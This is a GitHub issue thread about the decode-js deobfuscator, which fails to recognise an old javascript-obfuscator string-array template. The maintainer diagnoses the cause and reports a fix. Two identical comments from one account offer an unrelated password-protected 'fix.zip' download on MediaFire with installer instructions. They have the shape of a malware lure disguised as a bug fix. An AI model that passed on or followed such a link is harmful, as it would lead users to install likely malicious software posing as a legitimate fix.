### ISSUE TITLE
obfuscator: 无法识别不含有rotate-function的旧版本string-array模版

### ISSUE THREAD

**Issue by goodwenhao** [echo094/decode-js#115]
### Which plugin are you reporting a bug for?

obfuscator

### Version of Node

18.20.4

### Input code

https://github.com/goodwenhao/study/blob/main/test2

### Additional context

类型: obfuscator
输入: input.js
输出: output.js
还原数值...
处理全局加密...
Try v3 mode...
Try v2 mode...
Essential code missing!
Cannot find string list!

**Comment by echo094** [comment]
这个样本的string array是数组，且不含有排序函数，导致它无法被已知的obfuscator混淆特征所匹配。

目前的匹配方案是当string array是数组时，先匹配排序函数，然后定位其它必要内容。

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by goodwenhao** [comment]
> 这个样本的string array是数组，且不含有排序函数，导致它无法被已知的obfuscator混淆特征所匹配。
> 
> 目前的匹配方案是当string array是数组时，先匹配排序函数，然后定位其它必要内容。

最新版还不行

**Comment by echo094** [comment]
经过仔细比较，根据模版 [StringArrayRC4DecodeTemplate](https://github.com/javascript-obfuscator/javascript-obfuscator/blob/51523c0d5cce3a53e1ceb05286543484feb3ad63/src/custom-code-helpers/string-array/templates/string-array-calls-wrapper/StringArrayRC4DecodeTemplate.ts) 基本确认这个样本使用的版本在(0.25.0 <= v < 2.10.0)

后续会进行适配

**Comment by echo094** [comment]
已更新
